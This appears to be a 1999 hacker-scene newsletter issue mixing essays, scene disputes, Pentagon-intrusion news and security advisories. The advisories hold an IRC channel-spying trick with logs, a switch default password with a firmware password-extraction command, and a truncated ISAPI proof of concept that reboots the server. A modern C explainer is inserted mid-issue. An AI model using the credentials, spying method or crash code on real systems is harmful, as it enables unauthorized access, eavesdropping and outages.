taking on the bigwigs, can now run the underdog browser on
the underdog OS.
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG
~~~~~~~
Lots of mail, not much for sharing here though ... keep the letters coming!
but don't forget to include something I can print too... ;)
. . . . . . .
// Written by NUL (If you don't know, don't ask)
// http://come.to/hexx (UnderConstruction)
// jeanclaude@canada.com
// 99/03/11
#include <If you want to, you can.>
To start this off I would like to make one thing abundantly clear: I do not consider myself
a hacker. I'm more interested in programming than anything else. Sure, I've toiled a bit,
but I cannot be considered as one of the El33t.
The reason for which I am writing this little article is to try to place a bit of clarity
on the reasons for hacking / cracking (or at least trying to make sense of them).
/* */
Hacking, the original motto was to do no damage, but as time went by and people developed
new skills, they decided that the original motto no longer applied to them. Thus the cracker
was born.
Hacking and Cracking are two different entities. You cannot be both at the same time. You
are either one or the other. (For those of you who consider yourselves as hackers or crackers
but use other people's scripts to hack/crack, you are neither. Anybody can point and click
their way along or run a program which does all the work for you; it doesn't require any talent.)
There are a few things that I find pointless in what the cracker community is doing:
First off: What the hell is the point of saying a server's security is shit if you don't
help the server fix it??? What? Hack into it a second time? (I know there are
a few groups out there who actually do help the servers they crack. This part
doesn't concern you.)
Second: Why the hell do people think that they are Eleet when they use a script to
determine what systems are vulnerable, and then exploit that vulnerability?
Just because you know one or two tricks doesn't make you anything.
Third: & what the hell is the point of writing in Eleet text? It's all fine and dandy
if you can't spell, but please, half the time you sound like you never got a high
school education!
Power can only corrupt. Crackers who develop their skills eventually lose control (though
this isn't true for everybody); they can't help but feel destructive. Though there are different
levels of destructiveness (as I see it):
A: Destroying all information, just for the heck of it.
B: Distributing information / programs to ruin a business.
C: Defacing information.
D: Replacing information, but leaving a back-up copy.
E: Destroying all information, for good purposes.
The last one (E) does fall into the category of cracking because it still is vandalism of
information even though it's for a good purpose (cracking the KKK server(s) and destroying
everything would be considered a class E).
Ok, ok I know... This did kind of turn out to be a bit different than what it was supposed
to be, but still I think I did manage to get a small message across...
// EOF
Props to; Parse, OTH, kokey, Pyra, Qubic, siko, spikeman and spacerogue and
tattooman among others ..
@HWA
02.0 From the editor.#9
~~~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
int main(void)
{
printf ("Read commented source!\n\n");
/*
* Blech, fuck snow ... and overclocked chips that can't take the
* heat even with oversize fans and sinks duct taped to them ... ;)
*
* Moving right along, thanks for the continued support everyone and tty next time...
*/
printf ("EoF.\n");
return 0;
}
w00t w00t w00t! ...
w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk.
1. A transcursion or transcendance into joy from an otherwise inert state
2. Something Cruciphux can't go a day without typing on Efnet
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
02.1 Demoniz trashcans his webboard
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Less than a month after the very cool bikkel security site closed down
demoniz has pulled the plug on his webboard which he left running after
closing down the main news site. Citing DoS attacks and spam as being
the #1 reasons, it turns my stomach just to think of this...pulled from
help net security's site.
http://net-security.org/
WEBBOARDS
by deepcase, Monday 8th Mar 1999 on 1:34 pm CET
Bikkel's Webboard which was first a project for a private webboard with
user login and password is finally down. In an email I received from
demoniz he said "The board is offline for good. I gave my best shot, but
it didn't work. The ingoing Denial of Service attacks on our server, the
spams and the threats made me so sick that I removed it. I won't provide a
service for a scene which is being dominated by little kids." Net Security
will think about setting up a new webboard, but we aren't sure about this yet.
As a side note, we've set up a 'webboard' that is published by the beseen
company and it has seen no action as of yet, you might want to check it out
and we can see how well it works (or doesn't as the case may be.) - Ed
@HWA
03.0 AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Innerpulse.com...
AntiOnline.com Threatens Legal Action
Contributed by siko
Thursday - March 04, 1999. 05:52PM GMT
Following a rash of insults at AntiOnline.com, Founder John Vransisomething
has threatened legal action against Innerpulse.com. Innerpulse has this
statement for Mister AntiOnline:
Talk your shit, grab your gat, call your click. But do not ever threaten
Innerpulse with legal action unless you want some keys dropped.If you ain't
ever been to the ghetto, you wouldn't understand the ghetto. You stay the fuck
out of the ghetto. Don't try to tell me using the term 'antionline.com' is a
violation of copyright laws. Its a fucking domain name. As for why we throw
shit all over you name, this is a very good example of why. He went so far as to
say the letter he sent me could not be reproduced without express written
permission. Fuck that. You can surf on over to Innerpulse but thats all, just surf
on by. It would be the biggest bitch move in Internet history to launch a legal
suit at opposition just because your feelings are hurt. Stop trying to be the
Microsoft of the underground community. Nothing will be removed. Nothing
will be discontinued. And I don't care if someone was stupid enough to invest
60 billion in you. Why don't you go to antihell.com. Punk ass.
Yeah, I posted it, What's Up Now Monkey? <link> http://innerpulse.com/jp.txt
(The text from the above link appears in its entirety below - Ed)
"<pre>aka Siko:
I am sending you this letter to officially request that the content that
relates to AntiOnline currently posted at the following URL be removed
promptly: http://www.innerpulse.com/
By references in your pages, I am sure that you are aware that
"AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold
rights to. The language used on your page is not only inflammatory, it is
flat out libelous. That content, combined with references to "AntiOnline"
is what has led me to write this letter.
While comedic parody is a protected first amendment right, knowingly
printing false, libelous information about a company, in the context of it
being news, so that others may believe it to be fact, is not. We have
received several e-mails from individuals questioning whether some of the
information posted on your page, is factual news, or fictional writing.
Also, the re-print of trademarks which are the property of another
company, without written authorization, do not fall under first amendment
rights.
By sending you this letter, I am hoping that we can settle this matter
without me being forced to seek a legal remedy. However, if you are not
willing to cooperate with my requests, I may very well be forced into
finding legal recourses, which may include a civil lawsuit. You will
receive no further communications from me directly. If the content is not
removed within 24 hours, this matter will be handed over to my legal counsel.
Legal action may be filed shortly thereafter to recover damages done to
AntiOnline's trade and reputation.
A copy of this letter has been sent "blind carbon" to several third party
individuals, so that it may be established that I have given you
opportunity to remove the content voluntarily.
If you have any questions regarding my request, you may contact me via an
e-mail to jp@antionline.com or by phone at (724)773-0940.
I would like to thank you in advance for what I hope will be a prompt
response to my requests.
Very Truly Yours,
Mr. John Vranesevich
General Partner, AntiOnline
--------------------------------------------------------------------------------
This letter is copyright 1999, AntiOnline LLP
Reprint without written authorization is strictly prohibited...
</pre>"
Our Reply to JayPee <link> http://innerpulse.com/jp-reply.txt
Hi,
After I saw the e-mail you sent to siko I wanted to give you my idea
on this issue, as I provide web hosting for Innerpulse.com and
occasionally work on the website. Response below.
> aka Siko:
>
> I am sending you this letter to officially request that the content that
> relates to AntiOnline currently posted at the following URL be removed
> promptly: http://www.innerpulse.com/
If you want to send an official letter, you don't use e-mail. You can
redirect official letters to our main administrative NOC at:
[CubeSoft Communications]
Cp2, Rr2, H.a.m
Magdalen Islands, QC
G0B 1K0 CANADA
> By references in your pages, I am sure that you are aware that
> "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold
> rights to. The language used on your page is not only inflammatory, it is
> flat out libelous. That content, combined with references to "AntiOnline"
> is what has led me to write this letter.
First of all, I think you should be consulting a lawyer about this. I
did, and I can tell you that mentioning the name "AntiOnline" in a news
article is not libelous, as we never even put a link to your website (which
would not have been legally wrong either). Is mentioning "Microsoft" in a news
article libelous? I don't think so.
> While comedic parody is a protected first amendment right, knowingly
> printing false, libelous information about a company, in the context of it
> being news, so that others may believe it to be fact, is not. We have
> received several e-mails from individuals questioning whether some of the
> information posted on your page, is factual news, or fictional writing.
We don't want to take responsibility of the stupidity of your website's
visitors. Tell them to redirect their comments and questions to
contact@innerpulse.com. My personal opinion is that it is quite obvious whether an article is
true or not; Innerpulse adds a touch of humor to it, that's what makes Innerpulse
different.
> Also, the re-print of trademarks which are the property of another
> company, without written authorization, do not fall under first amendment
> rights.
Ahh I'm beginning to think you are referring to `AntiOnline-O-Rama' from
the INN features section. Do you seriously think I would have wasted my
time recopying AntiOnline's frontpage entirely?
This may be not in the scope of your technical skills, but that is
actually a link to a CGI script which simply acts as a proxy - it prints information
directly from AntiOnline.com, doing some word search/replaces in the process. By
changing the parameter you can do the same with any other website.
> By sending you this letter, I am hoping that we can settle this matter
> without me being forced to seek a legal remedy. However, if you are not
> willing to cooperate with my requests, I may very well be forced into
> finding legal recourses, which may include a civil lawsuit. You will
> receive
> no further communications from me directly. If the content is not removed
> within 24 hours, this matter will be handed over to my legal council.
> Legal action may be filed shortly there after to recover damages done to
> AntiOnline's trade and reputation.
I've been in that situation before, just one piece of advice: don't even think
about this; this will pass as a violation of free speech. And by the way, who
do you want to sue exactly?
> A copy of this letter has been sent "blind carbon" to several third party
> individuals, so that it may be established that I have given you
> opportunity to remove the content voluntarily.
I don't think so, John.
> If you have any questions regarding my request, you may contact me via an
> e-mail to jp@antionline.com or by phone at (724)773-0940.
>
> I would like to thank you in advance for what I hope will be a prompt
> response to my requests.
>
> Very Truly Yours,
> Mr. John Vranesevich
> General Partner, AntiOnline
@HWA
03.1 The FPSC-IRCD.txt advisory.
~~~~~~~~~~~~~~~~~~~~~~~~~~~
The FPSC-IRCD.txt advisory.
---------------------------
By: syg of the FPSC @3/7/98
ircd@FPSC.hemp.net
http://FPSC.hemp.net
Program affected:
IRCD
Versions affected:
All hybrid and other EFnet IRCD versions. Probably others.
Problem:
According to the date of this file, there are a few bugs in hybrid IRCD
and maybe others. I've checked DALnet's source and it seems theirs is fixed
and not affected. The bug is in match.c of the source code and starts on line
204 at 'tolowertab[]'. Note the line that consists of the following:
"'t', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~',". Then go to line 238
in match.c to 'touppertab[]'. Note the line that reads:
"'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^'," and compare the two
lines. The tables treat '{' as the lower-case form of '[', and likewise '|'
as the lower-case form of '\', '}' of ']', and '~' of '^'. What this
means is that they are the same characters in channel names and nicknames.
Now what can you do with this in such a way it would be a problem?
You can spy on channels that consist of any one of those 8 characters below:
1) { --Defined as LowerCase [
2) [ --Defined as UpperCase {
3) } --Defined as LowerCase ]
4) ] --Defined as UpperCase }
5) | --Defined as LowerCase \
6) \ --Defined as UpperCase |
7) ~ --Defined as LowerCase ^
8) ^ --Defined as UpperCase ~
This problem and mIRC make a dangerous combination. Let's say a bunch of your
friends hang in #mIRC] and you run BitchX. All you have to do is join
#mIRC} and their mIRC clients won't see you join the channel, which means you
are a ghost and therefore are invisible. Another example would be:
two people are in #Love^2 and you run BitchX. All you would have to do is
join #Love~2 and they won't see you join, therefore you can spy on their
conversation all night long. Now if one of the mIRC people happened to type
"/names #mIRC]" or "/names #Love^2" you would magically pop up in the nick
list of the channel. The same happens if someone joins the channel
after you have joined: you will show up in their names list, which
puts you in their nick list in the channel window. Be creative and have fun.
Logs:
The "->->->" is me telling you whats going on.
->->-> In mIRC I typed /join #[ with the nick mIRC-1
*** Now talking in #[
->->-> No one is in the channel but me in the nick list.
->->-> Then I looked in my status window and got the join info.
#[ @mIRC-1
#[ End of /NAMES list.
#[ created on Thu Feb 25 14:13:45
->->-> Then in another mIRC client I typed /join #{ with the nick mIRC-2
*** Now talking in #{
->->-> No one is in the channel but me in the nick list.
->->-> Then I looked in my status window and got the join info.
#[ mIRC-2 @mIRC-1
#{ End of /NAMES list.
#[ +
#[ created on Thu Feb 25 14:13:45
->->-> NOTE: I can't see mIRC-1 in the nick list in the channel.
->->-> I also can't see mIRC-2 in mIRC-1's nick list.
->->-> So basically it's like two different channels when you are in mIRC.
->->-> Let's now bring bitchX into play...
->->-> In BitchX under the nick BitchX-1 i typed /join #[
BitchX-1 [test@FPSC.hemp.net] has joined #[
[Users(#[:3)]
[ BitchX-1 ] [ mIRC-2 ] [@mIRC-1 ]
Channel #[ was created at Thu Feb 25 14:13:45 1999
BitchX: Join to #[ was synced in 0.391 secs!
->->-> Now under mIRC-1's client I saw...
*** BitchX-1 (test@FPSC.hemp.net) has joined #[
->->-> Which I should have because we are both in #[
->->-> But on the other hand, under mIRC-2's client( The one in #{ )...
->->-> I didn't see BitchX-1 join.
->->-> And as you can see, BitchX-1 see's mIRC-2 in the channel #[
->->-> Now let me type with all three of them.
->->-> Under all three clients I will type their nick and chan to the channel.
->->-> Under BitchX-1's client I saw all three clients talk...
<mIRC-1> mIRC-1 #[
<mIRC-2> mIRC-2 #{
<BitchX-1> BitchX-1 #[
->->-> Under mIRC-1's client I saw myself and BitchX-1 type (We are both in #[)
<mIRC-1> mIRC-1 #[
<BitchX-1> BitchX-1 #[
->->-> Under mIRC-2's client I saw myself type only ( Im in #{ )
<mIRC-2> mIRC-2 #{
->->-> As you can see mIRC-2 is being spy'd on by the BitchX client.
->->-> End of logs.
Solution:
The fix would be to simply edit /src/match.c of the source code. DALnet
seems to have a nice match.c at ftp.dal.net in df467.tgz if you EFnet staff
need any ideas. We all hope to see this fixed in your next release of hybrid.
Final Notes:
IRCD coders and staff members of all networks and all IRCD versions need
to check your source for this bug and fix it before it gets abused... maybe it
was you in #^locals^ giving your phone number out to a friend which was being
spied on by another local enemy. Other than that, everyone keep up the good
work and so long. Also, thanks to sate for helping me test this out.
Questions/jobs/info/etc: ircd@FPSC.hemp.net -syg
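The folding the advisory describes is not a hybrid-only quirk: RFC 1459 section 2.2 defines {, } and | as the lower-case forms of [, ] and \ (the EFnet/hybrid tables additionally pair ~ with ^), so the server treating #mIRC] and #mIRC} as one channel is by design, and the visible damage comes from a client that folds only A-Z and therefore keeps two separate channel windows. The C program below is an added example, not code from the advisory, from hybrid's match.c, or from any IRC client: it re-implements that fold table, contrasts it with a plain ASCII comparison, and computes the alternate spelling a "ghost" would join. The channel names used are the advisory's own; the function names are this example's.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Server-side fold table, built once: A-Z -> a-z, plus the RFC 1459 pairs
 * []\ -> {}| and the EFnet/hybrid extension ^ -> ~.  This mirrors what
 * tolowertab[] in match.c encodes; it is not copied from any ircd. */
static unsigned char fold_tab[256];
static int fold_ready = 0;

static void fold_init(void)
{
    int c;
    if (fold_ready)
        return;
    for (c = 0; c < 256; c++)
        fold_tab[c] = (unsigned char)c;
    for (c = 'A'; c <= 'Z'; c++)
        fold_tab[c] = (unsigned char)(c - 'A' + 'a');
    fold_tab['['] = '{';
    fold_tab[']'] = '}';
    fold_tab['\\'] = '|';
    fold_tab['^'] = '~';
    fold_ready = 1;
}

/* Server view: returns 0 when a and b name the same channel or nick. */
int rfc1459_strcasecmp(const char *a, const char *b)
{
    const unsigned char *p = (const unsigned char *)a;
    const unsigned char *q = (const unsigned char *)b;
    fold_init();
    while (*p && fold_tab[*p] == fold_tab[*q]) {
        p++;
        q++;
    }
    return (int)fold_tab[*p] - (int)fold_tab[*q];
}

/* Client view that folds only A-Z (what a client keeping separate windows
 * for #mIRC] and #mIRC} is effectively doing): returns 0 when equal. */
int ascii_strcasecmp(const char *a, const char *b)
{
    const unsigned char *p = (const unsigned char *)a;
    const unsigned char *q = (const unsigned char *)b;
    while (*p && tolower(*p) == tolower(*q)) {
        p++;
        q++;
    }
    return tolower(*p) - tolower(*q);
}

/* Nonzero if name contains any of the eight characters with a fold
 * partner, i.e. the channel can be joined under a second spelling. */
int has_fold_partner(const char *name)
{
    return strpbrk(name, "[]\\^{}|~") != NULL;
}

/* Write the alternate spelling of name into dst: each character with a
 * fold partner is swapped for its partner, everything else is copied.
 * That is the name a second client can join to sit in the same
 * server-side channel while ASCII-only clients show a different window. */
char *partner_spelling(char *dst, size_t dstlen, const char *name)
{
    static const char from[] = "[]\\^{}|~";
    static const char to[]   = "{}|~[]\\^";
    size_t i;
    for (i = 0; i + 1 < dstlen && name[i] != '\0'; i++) {
        const char *hit = strchr(from, name[i]);
        dst[i] = hit ? to[hit - from] : name[i];
    }
    dst[i] = '\0';
    return dst;
}

/* Helper for checks: nonzero if partner_spelling(name) equals expected. */
int partner_is(const char *name, const char *expected)
{
    char buf[64];
    return strcmp(partner_spelling(buf, sizeof buf, name), expected) == 0;
}

int main(void)
{
    char alt[64];
    printf("server: #mIRC] vs #mIRC} -> %s\n",
           rfc1459_strcasecmp("#mIRC]", "#mIRC}") == 0 ? "same channel" : "different");
    printf("client: #mIRC] vs #mIRC} -> %s\n",
           ascii_strcasecmp("#mIRC]", "#mIRC}") == 0 ? "same channel" : "different");
    printf("ghost spelling of #Love^2: %s\n", partner_spelling(alt, sizeof alt, "#Love^2"));
    return 0;
}
```

The practical check for an operator or bot author is has_fold_partner(): any channel whose name contains one of those eight characters can be entered under a spelling that some clients will not recognise, so comparisons of channel and nick names on the client side must use the same fold table as the server rather than an ASCII-only strcasecmp().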
@HWA
04.0 Pentagon under attack
~~~~~~~~~~~~~~~~~~~~~
March 7th, 1999
From http://www.hackernews.com/
Pentagon investigates Russian cyberattacks
contributed to HNN by Bronc
A probe has been launched into recent efforts of crackers attempting to
access Pentagon computer systems. Pentagon officials are unsure if this
is a coordinated attack or the work of separate individuals.
Early indications show that many of the attacks have originated in Russia
and may have had the assistance of an insider. No classified networks have
yet been breached. U.S. Deputy Defense Secretary John Hamre has been
quoted as saying "It is a major concern." (Ed Note: This is the same John
Hamre who last year was quoted as saying "This is the most coordinated
attack we have seen to date" when referring to attacks on government
systems by three teenagers.)
Follow up here:
http://abcnews.go.com/sections/world/DailyNews/pentagonrussia990304.html
http://www.techserver.com/story/body/0,1634,24763-40126-294330-0,00.html
http://www.msnbc.com/news/246801.asp
http://www.smh.com.au/news/9903/05/breaking2/news1.html
And from Innerpulse.com; www.innerpulse.com
United States: Cyberwar?
Contributed to Innerpulse by siko
Sunday - March 07, 1999. 06:10PM GMT
Innerpulse has decided not to join the media inflated 'Cyberwar' reporting
until today. We have been doing extensive research and have discovered some
exclusive details.
We all know the so called 'facts'. Coordinated attacks on certain servers have
officials at the Pentagon looking for answers, and quickly. What certain people
forget, is that the man who said this is the most organized attack to date, is also
the man that said a 16 year old kid named 'Makeveli' had also launched an
extremely organized attack on government servers. For those who aren't into
the urban musical subculture, Makeveli most likely came from the popular
rapper, Tupac's influence. They have stated the attacks are coming from
Canada and Thailand amongst others. Yet they can not trace any further.
Sorry, if you can tell the country then you have the IP, and the ability to find the
source.
The United States is not at Cyberwar with anyone but the media, who took a
couple of failed hack attempts and turned it into World War III. Innerpulse has
conducted various interviews and can now finger the source of this terror. His
name is John Vranesevich, which traces back to packetz.antionline.com. In an
effort to get more publicity for breaking a story, he blew up a situation leading
many respected news outlets into believing this was actually as blown out of
proportion as he made it sound. And on top of that, they pick Hamre, the man
who called an Undernet hacker named 'Makeveli', a serious threat to the
United States National Security.
The Pentagon may be experiencing more attacks lately. This is not blown out of
proportion. But if you take a moment to question the motives of people who
would attempt to crack into a government server.. Perhaps because it gains you
recognition and fame as it has done for so many in the past? This is the same
reason antionline.com gets lots of crack attempts every day, because almost
everyone in the 'hacker' community wants to be known for breaking the site
that sold out.
The United States is not currently involved in a Cyber War, never has been, and
most likely will not be in any of our reader's lifetimes.
But, if someone really cracks a Pentagon server and fires a missile at me, boy
won't I feel silly.
And a fairly intelligent article with little FUD from ABC news...
http://www.abcnews.go.com/sections/tech/DailyNews/pentahack990309.html
Pentagon Attacks Overblown?
Hackers Complain Government Computers Over-Sensitive
By Michael J. Martinez
ABCNEWS.com
March 9: Last week, the Pentagon reported
that over the last several months its computer
systems have withstood an unprecedented and
concerted series of external attacks.
U.S.-based hackers might simulate an attack from abroad by routing
their signals through a series of far-flung servers. (ABCNEWS.com)
Deputy Defense Secretary John Hamre confirmed the
attacks, calling them a major concern. Pentagon officials
stated that the electronic infiltrations have come from
abroad most likely Russia. To Pentagon watchers, and to members of the
loosely knit hacker fraternity in the United States, those claims
sounded familiar.
Terrorists or Teens?
Last February, Hamre announced that the Pentagon was undergoing
the most intense, coordinated cyberattack it had ever seen. Over a
two-week period, unknown hackers launched coordinated attacks against
hundreds of military domains and servers.
After weeks of investigation, the culprits were nabbed. They turned
out to be an 18-year-old Israeli computer enthusiast with a lot of
time on his hands, and two teenagers from California who were using
readily available software tools downloaded from the Internet to
discredit the Pentagon's computer security. No hackers claimed credit
for the latest assaults; there was no bragging in IRC chat rooms or
on Web pages, as typically happens after well-publicized computer
attacks on government systems.
"That could mean a number of different things," says Dr. Peter Tippett,
president of ISCA, Inc., a computer security firm. "The attacks aren't
that bad, the person doing it doesn't want to take credit, or the
attacks are coming from overseas." The latest assaults could have
come from foreign governments, terrorist organizations or from the
proverbial mischievous teenager.
Recon vs. Frontal Assault
What exactly constitutes an attack? Hackers
customarily scan remote computer systems, looking for security holes
through which to send or retrieve data. Tools for such scans are
readily available for downloading from the Internet.
"These scanners basically take known holes and hit a server, one after
another, asking it if these holes are open," says an independent hacker
known as Bronc Buster. "They may or may not be there, but as far as logs
on systems will show, unless you are an experienced admin and can tell
the difference, you are being attacked."
The Pentagon, however, does not differentiate between scans, which are
essentially cyberspace reconnaissance, and full attacks, when a malicious
system cracker actively attempts to break through security. Tippett
points out that scans are useful for later attack, and that determined
hackers have found ways to conduct scans without setting off alarms.
Most servers have thousands of accounts, and thus thousands of entry
points. If a hacker takes his time, and only pings a few entry points
every so often, he can usually avoid notice.
In recent congressional testimony, Hamre said Defense Department
computers are attacked upwards of 60 times per week, with about 10 such
attacks requiring additional investigation. He did not differentiate
between scans or infiltration attempts.
From Russia With Love
The theory that the recent attacks came from Russia is also questionable.
When it comes to the Internet, geography quickly becomes irrelevant.
Hacking tools, some of which are readily available online, could allow a
would-be hacker to fake his own locale information, or channel his attack
through servers all around the world. "I don't know how the Pentagon would
know where the attacks come from," Tippett says. "If you have access to
enough servers, it's relatively easy to re-route your connection to make
it appear you're in Russia, when you could just be down the street."
Rep. Curt Weldon, R-Pa., who chairs the subcommittee of the House
Armed Services Committee where Hamre testified, acknowledges that the
starting point of the recent computer assaults is still in doubt. But he
contends the new attacks represent a new kind of warfare, in which less
powerful nations could gain an edge against the United States by hacking
into and knocking out key computer systems. "This appears to be a
coordinated effort to break into our computer system, and we're not giving
the problem the kind of visibility it needs," Weldon says. "This Y2K thing
is a piece of cake compared to this."
OXBlood Ruffin, foreign minister for the hacker group Cult of the
Dead Cow, has another view. "It smells like someone is looking for increased
budgets," Ruffin wrote in an e-mail, calling Hamre's alarms a typical crying
game from the military.
Hacking Into a Government Computer
According to a Philadelphia-based hacker who calls himself El Diablo,
government computers are far too quick to register an attack. El Diablo,
affiliated with the HologramNation hacker group, should know: he accessed
the White House Web server.
Instead of using a Web browser, El Diablo accessed the whitehouse.gov
host address via Telnet. Telnet is a common way for a user to log directly
into a server, accessing the server's systems remotely. Once dialed in,
El Diablo encountered the following warning: "You are about to access a U.S.
Government computer system. Access to this system is restricted to authorized
users only. Anyone who accesses this system without authorization, or exceeds
authorized access, could be subject to a fine or imprisonment, or both, under
Public Law 98-473."
The message went on to say that the user was being monitored.
The computer then asked for a username and password, at which point El Diablo
exited. "What this seems to say is that I just hacked into the government
computers," he says. "The hackers [accessing Pentagon computers] could have
simply done that, and the government could have blown this waaaaaay out of
proportion."
Many people Telnet into their work computers; it's not some obscure
hacker tool. Yet the White House says what El Diablo did is a potential attack.
"I'm sure lots of people Telnet into that server, either to just have a look,
or they access it by mistake, and that's OK," said White House spokesman Mark
Kitchens. "But that is still considered an attempt at breaching security."
@HWA
04.1 Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 5 Mar 1999 12:19:59 -0800
From: JEK <jkolde@EARTHLINK.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Cheyenne InocuLAN for Exchange plain text password still there
This dates back to Ron Watkins' post on 12/16/98 regarding the plain text
account name/password left in the exchverify.log file by the installation of
Cheyenne's Anti-Virus Agent for Exchange.
Quote from Ron:
"I was called on Monday by Brian Linton at Computer Associates. He says
that the plaintext admin password was put into c:\exchverify.log by earlier
versions of the Arcserve Exchange client, but that build 57 (the most recent
version) puts only the length there. It does not erase that file as new
installs are done, but rather appends, which is why some folks still had
that plaintext password even after installing the most recent build."
I am currently testing AV Agent for Exchange and installed what I was told
was the most recent version (build 64) on a clean NT 4.0/SP4/Exchange 5.5
server running InocuLAN for NT 4.0 (build 375). This was a fresh build and
*not* upgraded from earlier versions of any software. The exchverify.log
file is still there and still contains the account name and password in
clear text - NOT merely the length as stated above.
JEK, MCSE
@HWA
04.2 Default passwords in Bay networks switches
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 10 Mar 1999 14:48:58 -0800
From: Jan B. Koum <jkb@BEST.COM>
To: BUGTRAQ@netspace.org
Subject: Default password in Bay Networks switches.
Ok.. so you would think after 3Com $%#& up last year of inserting
default password into firmware vendors would learn their lesson?
[See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant]
Hah! Welcome to the world of strings and Bay Networks firmware
files. I have looked at some bay networks switches and see that
the following have default password of "NetICs"
BayStack 350T HW:RevC FW:V1.01 SW:V1.2.0.10
BayStack 350T HW:RevC FW:V1.01 SW:V2.0.0.15
These however I was not able to find defaults for:
BayStack 350-24T HW:RevA FW:V1.04 SW:V1.0.0.2
Bay Networks BayStack 303 Ethernet Switch
BayStack 28115/ADV Fast Ethernet Switch
If you have firmware images for the above, just
% strings *.img | grep -B5 "Invalid Password"
Something similar to this command might give you the passwd.
Of course I don't have to tell you about how bad it is when
someone can control your network infrastructure (switches).
I don't have much experience with Bay hardware (in fact, I have
none - someone at work just asked me to help them get into a
switch for which they forgot the password). If someone can
shed some light on this topic, it would be great.
And yes, I consider this to be a backdoor - wouldn't you call it
a backdoor if Solaris had default password for root logins?
How can vendors in 1999 even THINK about something as stupid as
inserting a default password like this into a switch!?!?
Granted - I am almost sure Bay didn't have evil intentions for
the use .. but still. I am speechless.
-- Yan
P.S. - Greetz to the inhabitants of #!adm and #!w00w00
------------------------------------------------------------------------------
Date: Wed, 10 Mar 1999 17:06:05 -0700
From: Dax Kelson <dkelson@INCONNECT.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Default password in Bay Networks switches.
On Wed, 10 Mar 1999, Jan B. Koum wrote:
> Ok.. so you would think that after 3Com $%#& up last year by inserting a
> default password into firmware, vendors would learn their lesson?
> [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant]
>
> Hah! Welcome to the world of strings and Bay Networks firmware
> files. I have looked at some bay networks switches and see that
> the following have a default password of "NetICs"
The Bay Networks case number for this bug/oversight is: 990310-614
Normally "backdoor" passwords on Bay gear only work through the console.
Dax Kelson
Internet Connect, Inc.
------------------------------------------------------------------------------
Date: Wed, 10 Mar 1999 17:16:53 -0800
From: Jon Green <jogreen@NORTELNETWORKS.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Default password in Bay Networks switches.
> And yes, I consider this to be a backdoor - wouldn't you call it
> a backdoor if Solaris had a default password for root logins?
> How can vendors in 1999 even THINK about something as stupid as
> inserting a default password like this into a switch!?!?
> Granted - I am almost sure Bay didn't have evil intentions for
> the use .. but still. I am speechless.
This was fixed in version 2.0.3.4 of the BS350 code last November.
The backdoor is still there for console access, but not for telnet.
This problem only affected the Baystack 350T and 350F, it did not
affect the 350-24T or 450. Also, note that the 350 has always had the
ability to limit telnet logins to certain source addresses; it is
recommended that that feature be used.
Software upgrades for the 350 can be found at
http://support.baynetworks.com under Software. If you don't
have a support contract, call (800) 2LANWAN.
-Jon
-------------------------------------------------------------------
Jon Green 4301 Great America Pkwy
Senior Competitive Test Engineer Santa Clara, CA 95054
Nortel Networks (408) 495-2618 Voice
jogreen@nortelnetworks.com (408) 495-4540 Fax
-------------------------------------------------------------------
@HWA
04.3 ISAPI Exploit code
~~~~~~~~~~~~~~~~~~
Date: Tue, 9 Mar 1999 10:54:47 -0500
From: Fabien Royer <fabienr@BELLATLANTIC.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM
> -----Original Message-----
> From: Patrick CHAMBET [mailto:pchambet@club-internet.fr]
> Sent: Tuesday, March 09, 1999 5:27 AM
> To: Fabien Royer
> Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: Re: ISAPI Extension vulnerability allows to execute code as
> SYSTEM
>
>
> Any proof ? Any sample ? Any work around ?
> How can we test our servers ?
Using VC++, create an ISAPI extension project and call it CRbExtension.
Replace GetExtensionVersion() and Default() with the code below. Compile it
to something simple, like rb.dll.
Place it on your web server and invoke it from your browser like this
http://your.machine.name/scripts/rb.dll?
Note: if you are using IE4.0, don't call this from the machine that is
running the web server otherwise, the next time you log in, IE will recall
the last URL and you'll reboot again.
The workaround is to NEVER give users (or customers) the ability to use
ISAPI extensions if you allow them to upload CGIs to customize their home
page. An .exe on the other hand is much safer (if coded correctly).
Fabien.
BOOL CRbExtension::GetExtensionVersion(HSE_VERSION_INFO* pVer)
{
HANDLE hToken; // handle to process token
TOKEN_PRIVILEGES tkp; // pointer to token structure
// Get the current process token handle so we can get shutdown
// privilege.
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
// Get the LUID for shutdown privilege.
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1; // one privilege to set
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Get shutdown privilege for this process.
